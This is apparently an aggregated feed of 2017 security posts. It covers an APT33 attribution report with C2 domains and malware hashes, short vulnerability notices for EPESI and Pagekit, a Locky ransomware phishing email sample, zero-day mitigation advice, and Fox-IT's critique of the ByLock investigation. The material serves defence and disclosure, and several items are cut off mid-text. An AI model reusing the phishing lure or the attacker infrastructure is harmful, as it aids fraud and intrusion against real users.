In March 2017, Kaspersky released a report that compared DROPSHOT (which they call Stonedrill) with the most recent variant of SHAMOON (referred to as Shamoon 2.0). They stated that both wipers employ anti-emulation techniques and were used to target organizations in Saudi Arabia, but also mentioned several differences. For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment. Kaspersky also noted the difference in resource language sections: SHAMOON embeds Arabic-Yemen language resources while DROPSHOT embeds Farsi (Persian) language resources.

We have also observed differences in both targeting and tactics, techniques and procedures (TTPs) associated with the group using SHAMOON and APT33. For example, we have observed SHAMOON being used to target government organizations in the Middle East, whereas APT33 has targeted several commercial organizations both in the Middle East and globally. APT33 has also utilized a wide range of custom and publicly available tools during their operations. In contrast, we have not observed the full lifecycle of operations associated with SHAMOON, in part due to the wiper removing artifacts of the earlier stages of the attack lifecycle.

Regardless of whether DROPSHOT is exclusive to APT33, both the malware and the threat activity appear to be distinct from the group using SHAMOON. Therefore, we assess there may be multiple Iran-based threat groups capable of carrying out destructive operations.

Additional Ties Bolster Attribution to Iran

APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored. This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government.

The times of day at which APT33 threat actors were active suggest that they were operating in a time zone close to UTC+04:30. The observed attacker activity coincides with Iran Daylight Time, which is UTC+04:30.

APT33 largely operated on days that correspond to Iran’s workweek, Saturday to Wednesday. This is evident from the lack of attacker activity on Thursday, as shown in Figure 6. Public sources report that Iran works a Saturday to Wednesday or Saturday to Thursday work week, with government offices closed on Thursday and some private businesses operating on a half day schedule on Thursday. Many other Middle East countries have elected to have a Friday and Saturday weekend. Iran is one of few countries that subscribes to a Saturday to Wednesday workweek.

APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups. The publicly available backdoors and tools utilized by APT33 – including NANOCORE, NETWIRE, and ALFA Shell – are all available on Iranian hacking websites, associated with Iranian hackers, and used by other suspected Iranian threat groups. While not conclusive by itself, the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33’s familiarity with them and lends support to the assessment that APT33 may be based in Iran.


Figure 6: APT33 Interactive Commands by Day of Week
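The working-hours inference above can be sketched in a few lines: convert each observed command timestamp from UTC into the candidate local zone (UTC+04:30) and bucket by local weekday. The timestamps below are invented for illustration:

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

IRDT = timezone(timedelta(hours=4, minutes=30))  # Iran Daylight Time, UTC+04:30

def local_weekday(utc_ts: str) -> str:
    """Map a UTC activity timestamp to the weekday in the assumed local zone."""
    dt = datetime.strptime(utc_ts, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc)
    return dt.astimezone(IRDT).strftime("%A")

# 21:00 UTC on a Wednesday is already early Thursday morning in Tehran, so
# naive UTC bucketing would hide a Thursday lull in attacker activity.
events = ["2017-09-13 05:10", "2017-09-13 21:00", "2017-09-16 06:45"]
print(Counter(local_weekday(e) for e in events))
```

Run over enough interactive-command timestamps, a histogram like this is what produces the Thursday gap visible in Figure 6.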

Outlook and Implications

Based on observed targeting, we believe APT33 engages in strategic espionage by targeting geographically diverse organizations across multiple industries. Specifically, the targeting of organizations in the aerospace and energy sectors indicates that the threat group is likely in search of strategic intelligence capable of benefitting a government or military sponsor. APT33’s focus on aviation may indicate the group’s desire to gain insight into regional military aviation capabilities to enhance Iran’s aviation capabilities or to support Iran’s military and strategic decision making. Their targeting of multiple holding companies and organizations in the energy sector aligns with Iranian national priorities for growth, especially as it relates to increasing petrochemical production. We expect APT33 activity will continue to cover a broad scope of targeted entities, and may spread into other regions and sectors as Iranian interests dictate.

APT33’s use of multiple custom backdoors suggests that they have access to some of their own development resources, with which they can support their operations, while also making use of publicly available tools. The ties to SHAPESHIFT may suggest that APT33 engages in destructive operations or that they share tools or a developer with another Iran-based threat group that conducts destructive operations.

Appendix

Malware Family Descriptions

DROPSHOT (Non-Public): Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware

NANOCORE (Public): Publicly available remote access Trojan (RAT) available for purchase. It is a full-featured backdoor with a plugin framework

NETWIRE (Public): Backdoor that attempts to steal credentials from the local machine from a variety of sources and supports other standard backdoor features

TURNEDUP (Non-Public): Backdoor capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information

Indicators of Compromise

APT33 Domains Likely Used in Initial Targeting

Domain

boeing.servehttp[.]com

alsalam.ddns[.]net

ngaaksa.ddns[.]net

ngaaksa.sytes[.]net

vinnellarabia.myftp[.]org

APT33 Domains / IPs Used for C2

C2 Domain                  MALWARE
managehelpdesk[.]com       NANOCORE
microsoftupdated[.]com     NANOCORE
osupd[.]com                NANOCORE
mywinnetwork.ddns[.]net    NETWIRE
www.chromup[.]com          TURNEDUP
www.securityupdated[.]com  TURNEDUP
googlmail[.]net            TURNEDUP
microsoftupdated[.]net     TURNEDUP
syn.broadcaster[.]rocks    TURNEDUP
www.googlmail[.]net        TURNEDUP

Publicly Available Tools used by APT33

MD5                               MALWARE   Compile Time (UTC)
3f5329cf2a829f8840ba6a903f17a1bf  NANOCORE  2017/1/11 2:20
10f58774cd52f71cd4438547c39b1aa7  NANOCORE  2016/3/9 23:48
663c18cfcedd90a3c91a09478f1e91bc  NETWIRE   2016/6/29 13:44
6f1d5c57b3b415edc3767b079999dd50  NETWIRE   2016/5/29 14:11

Unattributed DROPSHOT / SHAPESHIFT MD5 Hashes

MD5                               MALWARE                      Compile Time (UTC)
0ccc9ec82f1d44c243329014b82d3125  DROPSHOT (drops SHAPESHIFT)  n/a - timestomped
fb21f3cea1aa051ba2a45e75d46b98b8  DROPSHOT                     n/a - timestomped
3e8a4d654d5baa99f8913d8e2bd8a184  SHAPESHIFT                   2016/11/14 21:16:40
6b41980aa6966dda6c3f68aeeb9ae2e0  SHAPESHIFT                   2016/11/14 21:16:40

APT33 Malware MD5 Hashes

MD5                               MALWARE                    Compile Time (UTC)
8e67f4c98754a2373a49eaf53425d79a  DROPSHOT (drops TURNEDUP)  2016/10/19 14:26
c57c5529d91cffef3ec8dadf61c5ffb2  TURNEDUP                   2014/6/1 11:01
c02689449a4ce73ec79a52595ab590f6  TURNEDUP                   2016/9/18 10:50
59d0d27360c9534d55596891049eb3ef  TURNEDUP                   2016/3/8 12:34
59d0d27360c9534d55596891049eb3ef  TURNEDUP                   2016/3/8 12:34
797bc06d3e0f5891591b68885d99b4e1  TURNEDUP                   2015/3/12 5:59
8e6d5ef3f6912a7c49f8eb6a71e18ee2  TURNEDUP                   2015/3/12 5:59
32a9a9aa9a81be6186937b99e04ad4be  TURNEDUP                   2015/3/12 5:59
a272326cb5f0b73eb9a42c9e629a0fd8  TURNEDUP                   2015/3/9 16:56
a813dd6b81db331f10efaf1173f1da5d  TURNEDUP                   2015/3/9 16:56
de9e3b4124292b4fba0c5284155fa317  TURNEDUP                   2015/3/9 16:56
a272326cb5f0b73eb9a42c9e629a0fd8  TURNEDUP                   2015/3/9 16:56
b3d73364995815d78f6d66101e718837  TURNEDUP                   2014/6/1 11:01
de7a44518d67b13cda535474ffedf36b  TURNEDUP                   2014/6/1 11:01
b5f69841bf4e0e96a99aa811b52d0e90  TURNEDUP                   2014/6/1 11:01
a2af2e6bbb6551ddf09f0a7204b5952e  TURNEDUP                   2014/6/1 11:01
b189b21aafd206625e6c4e4a42c8ba76  TURNEDUP                   2014/6/1 11:01
aa63b16b6bf326dd3b4e82ffad4c1338  TURNEDUP                   2014/6/1 11:01
c55b002ae9db4dbb2992f7ef0fbc86cb  TURNEDUP                   2014/6/1 11:01
c2d472bdb8b98ed83cc8ded68a79c425  TURNEDUP                   2014/6/1 11:01
c6f2f502ad268248d6c0087a2538cad0  TURNEDUP                   2014/6/1 11:01
c66422d3a9ebe5f323d29a7be76bc57a  TURNEDUP                   2014/6/1 11:01
ae47d53fe8ced620e9969cea58e87d9a  TURNEDUP                   2014/6/1 11:01
b12faab84e2140dfa5852411c91a3474  TURNEDUP                   2014/6/1 11:01
c2fbb3ac76b0839e0a744ad8bdddba0e  TURNEDUP                   2014/6/1 11:01
a80c7ce33769ada7b4d56733d02afbe5  TURNEDUP                   2014/6/1 11:01
6a0f07e322d3b7bc88e2468f9e4b861b  TURNEDUP                   2014/6/1 11:01
b681aa600be5e3ca550d4ff4c884dc3d  TURNEDUP                   2014/6/1 11:01
ae870c46f3b8f44e576ffa1528c3ea37  TURNEDUP                   2014/6/1 11:01
bbdd6bb2e8827e64cd1a440e05c0d537  TURNEDUP                   2014/6/1 11:01
0753857710dcf96b950e07df9cdf7911  TURNEDUP                   2013/4/10 10:43
d01781f1246fd1b64e09170bd6600fe1  TURNEDUP                   2013/4/10 10:43
1381148d543c0de493b13ba8ca17c14f  TURNEDUP                   2013/4/10 10:43

Telaxus Epesi 1.8.1.1 arbitrary Execute Code Cross Site Scripting Vulnerability

Multiple cross-site scripting (XSS) issues were discovered in EPESI 1.8.1.1. The vulnerabilities exist due to insufficient filtering of user-supplied data (cid, value, element, mode, tab, form_name, id) passed to the EPESI-master/modules/Utils/RecordBrowser/grid.php URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.
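The generic fix for this class of bug is contextual output encoding: escape each user-supplied parameter before echoing it back into the page. A minimal sketch of the idea (the renderer below is hypothetical, not EPESI's actual code):

```python
import html

def render_cell(user_value: str) -> str:
    # html.escape neutralizes <, >, &, and quotes, so reflected input
    # renders as inert text instead of executing as markup or script.
    return "<td>%s</td>" % html.escape(user_value, quote=True)

print(render_cell("<script>alert(1)</script>"))
```

Escaping must match the output context (HTML body, attribute, JavaScript, URL); this sketch covers only the HTML-body case.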

Hack Naked News #141 – September 18, 2017

CCleaner is distributing malware, rogue WordPress plugins, Equifax replaces key staff members, and more. Jason Wood of Paladin Security discusses malicious WordPress plugins on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode141

Visit http://hacknaked.tv for all the latest episodes!

Science of CyberSecurity: Reasons Behind Most Security Breaches

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 2 of 5.

Q. What – in your estimation – are the reasons behind the many computer security breaches/failures that we see today?
Simply put, insecure IT systems and people are behind every breach. Insecure IT systems are arguably caused by people as well: whether it is poor system management, lack of security design, insecure coding techniques, or inadequate support, it all boils down to someone not doing security right. For many years seasoned security experts have advocated that people are the weakest link in security; even hackers say ‘amateurs hack systems, professionals hack people’. Yet many organisations still focus most of their resources and funds on securing IT systems rather than providing staff with sustained security awareness. Maybe this is a result of an IT security sales industry over-hyping the effectiveness of technical security solutions. I think most organisations can do more to address this balance, starting with better understanding the awareness level of, and risk posed by, their employees. For instance, the security awareness of staff can be measured by using a fake phishing campaign to detect how many staff would click on a link within a suspicious email. Analysing the root causes of past cyber security incidents is also a highly valuable barometer for understanding the risk posed by staff, and both can be used as inputs into the cyber risk assessment process.

A developer’s guide to complying with PCI DSS 3.2 Requirement 6 Article

My updated article on "A developer's guide to complying with PCI DSS 3.2 Requirement 6" was released on the IBM Developer Works website today.

This article provides guidance on PCI DSS requirement 6, which breaks down into 28 further individual requirements and sits squarely with software developers who are involved in the development of applications that process, store, and transmit cardholder data.

Heads up: Malware found in Piriform’s CCleaner installer

If you installed the free version of CCleaner after Aug. 15, a couple of nasty programs came along for the ride. Talos Intelligence, a division of Cisco, just published a damning account of malware that it found hiding in the installer for CCleaner 5.33, the version that was released on Aug. 15 and which, according to Talos, was still the primary download on the official CCleaner page on Sept. 11.

After notifying Piriform, CCleaner was, ahem, cleaned up and version 5.34 appeared on Sept. 12.

I just checked, and the current version available from Piriform is version 5.34. (Piriform was bought by antivirus giant Avast in July.)


I know I haven’t patched yet, and there’s a zero-day knocking at my door

I know I haven't patched yet, and there's a zero-day knocking at my door

Patching is important, but let's agree it takes time. It takes time to test and validate the patch in your environment, and to check its compatibility with the application software and the underlying services. And then, one fine day, an adversary hacks your server through this unpatched code while you are still testing. It breaks my heart, and I wonder: what can be done in the delta period while the team is testing the patch? The adversary, on the other hand, is busy either reversing the patch or using a zero-day to attack your systems. Once a patch is released, it's a race:

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team, or the one managing the vulnerable server. They have their SLA to apply updates on the OS or application servers. In my experience, a high severity patch has to be applied in 15 days, medium in 30 days, and low in 45 days. If the criticality is too severe, it should be managed in 24 to 48 hours, with enough testing of functionality, compatibility, and test cases with the application team or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but it is getting more realistic and frequent. The recent case of the Apache Struts vulnerability has done enough damage to many big companies, Equifax among them. I already addressed this issue, and the need for alternatives such as a WAF in the secure SDLC, in an earlier blog post.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero-day for your web application or underlying server, and you are busy patching, but what other security controls do you have in place?
Ask yourself these questions,

  1. Do I have an understanding of the zero-day exploit? Is it affecting my application, or a particular feature?
  2. Do I have a product/ tool for prevention at the application layer for network perimeter that can filter bad requests - Network WAF (Web Application Firewall), Network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/ tool for prevention at the application layer for host - Host based IPS, WAF etc.
  4. Can I just take the application offline, while I patch?
  5. What's the threat model and risk appetite if the exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it to spread across my environment?

Let's understand how these answers will support your planning to develop a resilient environment,

>> Understanding of the zero-day exploit

You know there's an exploit in the wild, but did your security team or DevOps engineers take a look at it? Did they find the exploit and understand its impact on your application? It is very important to understand what you are dealing with before you plan to secure your environment. Not all exploits are in scope for your environment, due to its limitations, frameworks, plugins etc. So do a bit of research, ask questions, and set your timelines accordingly. Best case, understand the pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it as well. Blocking is more effective when it's at the perimeter - earlier the better. And, if you have done good research on the exploit, or the threat-vector that can affect you; please take a note of the pattern and find a way to block it at the perimeter while you patch the application.
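As a concrete illustration: when the Apache Struts Content-Type exploit (CVE-2017-5638) became public, a perimeter rule could drop requests whose headers matched the OGNL injection pattern while the patch was still being tested. The signature below is a simplified, hypothetical sketch of such a rule; a production WAF rule needs careful tuning against false positives:

```python
import re

# Simplified signature for OGNL injection carried in the Content-Type header
# (as in CVE-2017-5638). Hypothetical stand-in for a real, tuned WAF rule.
OGNL_INJECTION = re.compile(r"%\{.*ognl", re.IGNORECASE | re.DOTALL)

def allow_request(headers: dict) -> bool:
    """Return False for requests whose headers match the exploit signature."""
    return not OGNL_INJECTION.search(headers.get("Content-Type", ""))

print(allow_request({"Content-Type": "application/json"}))                 # benign
print(allow_request({"Content-Type": "%{(#_='x').(ognl.OgnlContext)}"}))   # exploit-like
```

The point is not this particular regex but the workflow: extract a pattern from the public exploit, block it at the edge, and buy time for patching.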

>> Prevention at the application layer for host

There are times when, even though you know the pattern and the details of the exploit, the network perimeter is incapable of blocking it - for example, if SSL is offloaded on the server or load balancer. In this case, make sure the host knows what traffic is expected and blocks everything else, including anomalies. This can be achieved with host-based protection: an IPS or WAF.
Even a small tool like Tripwire can monitor directories and files to ensure the attacker cannot create files, or so that you get an alert at the right time to react. This can make a huge difference!
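A minimal sketch of that file-integrity idea: hash everything under the web root, then diff snapshots to catch dropped or modified files. The paths in the usage comment are illustrative:

```python
import hashlib
import os

def snapshot(root: str) -> dict:
    """Map every file under root to its SHA-256 digest."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                state[path] = hashlib.sha256(fh.read()).hexdigest()
    return state

def diff(before: dict, after: dict):
    """Report files added or modified between two snapshots."""
    added = set(after) - set(before)
    modified = {p for p in before if p in after and before[p] != after[p]}
    return added, modified

# e.g. run snapshot("/var/www") on a schedule and alert on any non-empty diff
```

A dropped web shell shows up as an added file; a patched-in backdoor shows up as a modified one. Real tools add exclusions, signed baselines, and tamper protection on top of this core loop.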

Note: Make sure the IPS (network/ host) is capable of in-depth packet filtering. If the pattern can be blocked on the WAF with a quick rule, do it and make sure it doesn't generate false positives which can impact your business. Also, do monitor the WAF for alerts which can tell you if there have been failed attempts by the adversaries. Remember, the attackers won't directly use their best weapon; usually it starts with "information gathering", or uploading files, or executing known exploits before customizing the case for their needs.

You have very high chances to detect adversaries while they are gathering insights about you. Keep a keen eye on any alert from production environment.

>> Taking application offline

Is it possible to take the application offline while you patch the software? This depends on the application's exposure, its CIA (Confidentiality, Integrity and Availability) rating, and the business impact assessment that has been performed. If you think that taking it offline can speed up the process and reduce the exposure without hurting your business, do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess and threat model the application. This is required because not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal, which substantially reduces the exposure and the underlying impact. Ask your team: is the application Internet facing, how many users use it, what kind of data does it deal with, etc., and act accordingly.

>> Brace for impact

Finally, if things still look blurred, start prepping yourself for impact. Try to minimize it by validating and restricting the access to the server. You can perform some sanity checks, and implement controls like,

  1. Least privilege accounts for application use
  2. Least interaction with the rest of production environment
  3. Restricted database requests and response to limit the data ex-filtration
  4. Keep the incident management team on high-alert.
Incident management - Are you sure you are not already breached?

Now, what are the odds that while you are reading this blog, trying to answer all the questions and getting ready, you haven't already been compromised? Statements about incidents used to begin with "What if..." but now they begin with "When...", so make sure all your monitoring systems are reporting anomalies and someone is monitoring them well. These tools are only good if a human being is responsibly validating the alerts. Once an alert is flagged red, a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blogpost. Don't be one of them.

Now, once you address these questions you must have a fairly resilient environment to either mitigate or absorb the impact. Be safe!

5 Ways to Secure Wi-Fi Networks

Wi-Fi is one entry point hackers can use to get into your network without setting foot inside your building. Wireless is much more open to eavesdroppers than wired networks, which means you have to be more diligent about security.

But there’s a lot more to Wi-Fi security than just setting a simple password. Investing time in learning about and applying enhanced security measures can go a long way toward better protecting your network. Here are six tips to better secure your Wi-Fi network.

Use an inconspicuous network name (SSID)

The service set identifier (SSID) is one of the most basic Wi-Fi network settings. Though it doesn’t seem like the network name could compromise security, it certainly can. Using too common an SSID, like “wireless” or the vendor’s default name, can make it easier for someone to crack the personal mode of WPA or WPA2 security. This is because the encryption algorithm incorporates the SSID, and the password-cracking dictionaries used by hackers are preloaded with common and default SSIDs. Using one of those just makes the hacker’s job easier.
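The SSID's role here is concrete: WPA/WPA2-Personal derives its 256-bit pairwise master key from the passphrase with PBKDF2-HMAC-SHA1, using the SSID as the salt. A short sketch (the passphrases below are purely illustrative):

```python
import hashlib

def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    # WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID,
    # 4096 iterations, 256 bits). A common SSID lets attackers reuse
    # precomputed key dictionaries; a unique SSID forces per-network cracking.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# Same passphrase, different SSIDs -> entirely different keys:
print(wpa2_psk("correct horse battery", "linksys").hex())
print(wpa2_psk("correct horse battery", "Lamprey42").hex())
```

Because the SSID is the salt, rainbow tables only work against SSIDs they were built for, which is exactly why default names like "linksys" are the ones precomputed.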


Malware spam: "Status of invoice" with .7z attachment

This spam leads to Locky ransomware:

Subject: Status of invoice
From: "Rosella Setter" ordering@[redacted]
Date: Mon, September 18, 2017 9:30 am

Hello,
Could you please let me know the status of the attached invoice? I appreciate your help!
Best regards,
Rosella Setter
Tel: 206-575-8068 x 100
Fax: 206-575-8094
*NEW* Ordering@[redacted].com
* Kindly note we will be

Startup Security Weekly #55 – Bald, Beautiful Men

Jason Brvenik of NSS Labs joins us. In the news, attributes of a scalable business, founder struggles, how to grow your startup, and updates from AppGuard, Securonix, CashShield, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode55

Visit https://www.securityweekly.com/ssw for all the latest episodes!

Pagekit 1.0.10 Remote Code Execution Vulnerability

An issue was discovered in Pagekit CMS before 1.0.11. When the debug toolbar is enabled, a remote attacker is able to reset a registered user's password and successfully recover the new password using this exploit. The SecureLayer7 ID is SL7_PGKT_01.

Science of CyberSecurity: Thoughts on the current state of Cyber Security

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 1 of 5.


Q. What are your thoughts on the current state of cybersecurity, both for organizations and for consumers?
Thanks to regular sensational media hacking headlines, most organisational leaders are worried about their organisation’s cyber security posture, but they often lack the appropriate expert support to help them properly understand their organisation’s cyber risk. To address the cyber security concern, an ‘off the peg’ industry best practice check-box approach is often resorted to. However, this one-size-fits-all strategy is far from cost effective and provides only limited assurance against modern cyber attacks, given that every organisation is unique and cyber threat adversaries continually evolve their tactics and methodologies.

In these difficult financial times of limited cyber security budgets, it is important for the cyber security effort to be prioritised and targeted. To achieve this, the cyber security strategy should be born out of threat intelligence, threat assessing and a cyber risk assessment. This provides organisational leaders with the information to make effective cyber security strategy decisions, and to allocate funding and resources based on a subject matter they do understand well: business risk.

Nothing can ever be 100% safeguarded; cyber security is, and always should be, a continual risk-based undertaking, requiring an organisation-risk-tailored cyber security strategy which is properly understood and led from the very top of the organisation. This is what it takes to stay ahead in the cyber security game.

VirusTotal += Avast Mobile Security

We welcome the Avast Mobile Security scanner to VirusTotal. This engine specializes in Android and reinforces the participation of Avast, which already had a multi-platform scanner in our service. In the words of the company:

"Avast Mobile Security is a complete security solution capable of identifying potentially unwanted (PUP) and malicious apps (TRJ). The app protects millions of endpoints on a daily basis using a wide range of cloud and on-device-based detection capabilities. Our hybrid mix of technology, which includes static and dynamic (behavioral) analysis in conjunction with the latest machine learning algorithms allow us to provide state of the art malware protection.

Avast has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-TEST, an AMTSO-member tester.

Enterprise Security Weekly #61 – Crying Uncle

Tom Parker of Accenture joins us. In the news, Bay Dynamics and VMware join forces, confessions of an insecure coder, Flexera acquires BDNA, and more on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode61

Visit https://www.securityweekly.com for all the latest episodes!

Fox-IT debunks report on ByLock app that landed 75,000 people in jail in Turkey

The Turkish government has been actively pursuing the prosecution of the participants of the Gülen movement in what it calls “the Fetullahist Terrorist Organization/Parallel State Structure (FETÖ/PDY)”. To this end, Turkey’s National Intelligence Organization (Millî İstihbarat Teşkilatı, or MİT in Turkish) has investigated the relation of a publicly available smartphone messaging application called ByLock to “FETÖ/PDY”, which is alleged to have been used during the failed coup attempt in Turkey on July 15, 2016.

The MİT is reported to have identified 215,092 users of ByLock, of which approximately 75,000 were detained. In an attempt to link a user of ByLock to a real person, the MİT has written a report on its findings, which concluded that “ByLock has been offered to the exclusive use of the ‘FTÖ/PDY’ members”.

However, the investigation performed by Fox-IT contradicts the key findings of the MİT. Fox-IT also discovered inconsistencies in the MİT report that indicated manipulation of results and/or screenshots by MİT. What is more, Fox-IT found that the MİT investigation is fundamentally flawed due to the contradictory and baseless findings, lack of objectivity and lack of transparency.

Overall, Fox-IT concluded that the quality of the MİT report is very low, especially when weighed against the legal consequences of its conclusions: the detention of 75,000 Turkish citizens.

This blog contains the conclusions of Fox-IT’s expert witness report. You can also download the full report of Fox-IT and the technical MİT report. The translated version of the MIT report will be made available later.

Reports

Fox-IT’s Expert Witness Report can be downloaded here.

md5: 3dac076d4e0d9d8984533bc04be336a7
sha1: 450ba8665d3a508d569bbc7ec761e9793e42d9c6
sha256: 7dbc402b8e03c311245814fb74dff699330d459f2067ecd574974538086caa7e

MIT’s Technical Report can be downloaded here.

md5: a9f18e08db62ef1c1f71101d37589157
sha1: 68a86e7b8b78c9d1493cb63318dba1f09cc62437
sha256: 17768d91bdae3e78499cb20214bf83abe49948a5d5f41c1aa35a1d1561dd0e62
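
To verify a downloaded copy against the digests above, a small sketch (the helper name is mine; the commented-out filename is illustrative, not the actual download name):

```python
import hashlib

def file_digests(data: bytes) -> dict:
    # The three digest types published above, computed over the file bytes.
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

# Usage against a downloaded report (filename illustrative):
#   d = file_digests(open("fox-it-expert-witness-report.pdf", "rb").read())
#   assert d["sha256"] == "7dbc402b8e03c311245814fb74dff699330d459f2067ecd574974538086caa7e"
```

Any mismatch against the published values means the copy was corrupted or tampered with in transit.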

Conclusions

1. What is Fox-IT’s opinion on the investigation methodology used by MIT in the ByLock investigation?

Multiple key findings from the MIT investigation were contradicted by open-source research conducted by Fox-IT, and other findings were shown not to be supported by the evidence presented by MIT. Furthermore, the MIT investigation lacks transparency: evidence and analysis steps were in many cases omitted from the MIT report. Multiple findings (those that could be verified) were shown to be incorrect, which leaves the impression that more findings would prove to be incorrect or inaccurate if only they could be verified.

Fox-IT finds the MIT investigation lacking in objectivity, since there is no indication that MIT investigated the alternative scenario: namely that ByLock has not exclusively been offered to members of the alleged FTÖ/PDY. Investigating alternate scenarios is good practice in an investigation. It helps prevent tunnel vision in cases where investigators are biased towards a predefined outcome. Fox-IT’s examination of the MIT investigation suggests that MIT was, in advance, biased towards the stated conclusion and that MIT has not shown the required objectivity and thoroughness in their investigation to counter this bias.

Fox-IT concludes that the MIT investigation as described in the MIT report does not adhere to the forensic principles as outlined in section 3.1 of this report and should therefore not be regarded as a forensic investigation. The investigation is fundamentally flawed due to the contradicted and unfounded findings, lack of objectivity and lack of transparency. As a result, the conclusions of the investigation are questionable. Fox-IT recommends to conduct a forensic investigation of ByLock in a more thorough, objective and transparent manner.

2. How sound is MIT’s identification of individuals that have used the ByLock application?

The MIT report contains very limited information on the identification of individuals. Fox-IT has shown that ByLock user accounts are, on their own, difficult to attribute to an individual: it is easy to impersonate other individuals when registering a ByLock account, and MIT is limited to an IP address from the ByLock server log to identify individuals. Attributing this IP address to actual individuals is not straightforward and is error-prone, possibly leading to the identification of the wrong individuals as ByLock users.
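
A toy illustration of the attribution problem (entirely hypothetical log data and format, not from either report): under carrier-grade NAT, many unrelated subscribers egress through the same public IP address, so a server-side IP does not identify one person.

```python
from collections import defaultdict

# Hypothetical, simplified server log entries: (timestamp, account, source IP).
log = [
    ("2016-07-01T10:00", "user_a", "85.10.20.30"),
    ("2016-07-01T10:02", "user_b", "85.10.20.30"),
    ("2016-07-01T10:05", "user_c", "85.10.20.30"),
    ("2016-07-02T09:00", "user_a", "91.44.1.7"),
]

accounts_per_ip = defaultdict(set)
for _, account, ip in log:
    accounts_per_ip[ip].add(account)

# Three distinct accounts behind a single address: the IP alone cannot
# say which subscriber was behind the keyboard at a given moment.
assert len(accounts_per_ip["85.10.20.30"]) == 3
```

The same ambiguity runs in both directions: one account can also appear behind many addresses over time, which is why a method mapping IPs to individuals needs to be documented and scrutinized.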

Fox-IT is unable to assess the soundness of the identification method, since the MIT report does not provide information on this method. The omission of a description of this method is troubling. Any errors in the method will not be discovered and the reader is left to assume MIT does not make mistakes. While transparency is one of the fundamental principles of forensic investigations, this critical part of the investigation is completely opaque.

3. What is the qualification of soundness on MIT’s conclusion regarding the relation between ByLock and the alleged FTÖ/PDY?

The conclusions and findings of the MIT report were examined by Fox-IT. It was shown that the argumentation is seriously flawed and that seven out of nine stated arguments are incorrect or questionable (see conclusion 6.1). The remaining two arguments are, on their own, not sufficient to support MIT’s conclusion. As a result, the conclusion of the MIT report, “ByLock has been offered to the exclusive use of the members of the terrorist organization of FTÖ/PDY”, is not sound.

4. Are there any other issues identified by Fox-IT that are relevant to the ByLock investigation?

Fox-IT encountered inconsistencies in the MIT report that indicate manipulation of results and/or screenshots by MIT. This is very problematic since it is not clear which of the information in the report stems from original data and which information was modified by MIT (and to which end). This raises questions as to what part of the information available to MIT was altered before presentation, why it was altered and what exactly was left out or changed. When presenting information as evidence, transparency is crucial in differentiating between original data (the actual evidence) and data added or modified by the analyst.

Furthermore, Fox-IT finds the MIT report implicit, not well-structured and lacking in essential details. Bad reporting is not merely a formatting issue. Writing an unreadable report that omits essential details reduces the reader's ability to scrutinize the investigation that led to the conclusions. When a report is used as a basis for serious legal consequences, the author should be thorough and concise, so as to leave no questions regarding the investigation.
Fox-IT has read and written many digital investigation reports over the last 15 years. Based on this experience, Fox-IT finds the quality of the MIT report very low, especially when weighed against the consequences of the conclusions.

5 Ways to Future-Proof IoT Devices

The absence of regulation is what has resulted in the software innovation we see today. But as hardware and software merge, and as the shelf life of software becomes the shelf life of hardware, we are going to need a number of guarantees to ensure that the benefits keep outweighing the risks.

I have never replaced my thermostat. Nor the control system of my lights in my flat. People buy a new oven or refrigerator every 10 years, a new car every 20 years maybe. And these are all run by software, old software, with bugs. And that is “fine” (mind the quotes), to the extent that someone takes responsibility for the system or solution as a whole, the collection of all these parts with a single brand name on the box that is legally responsible. Now think IoT. Thousands of individual vendors who sit mostly abroad, offshore code development with for the most part a lack of teams, unity or any other form of structure or legal jurisdiction for that matter. Low to no profit margins for technology sold by the lowest bidder where neither the buyer nor the seller have any interest in security.

The chip-maker of the device says they just sell chips; the manufacturer says they just implemented the chips and put them on the board; the software makers build the software for maybe hundreds of chips, ignoring some of the extra features and weaknesses that come with certain components. The product ships, and problems are found at a later stage, either through design errors or through implementation errors introduced while integrating a piece of software that has vulnerabilities. And this is where we are today.

Not a single snowflake feels responsible for the avalanche.

So, five things I would like to see as part of a basic set of guarantees when purchasing some of these products in the future:

  1. Guaranteed life expectancy
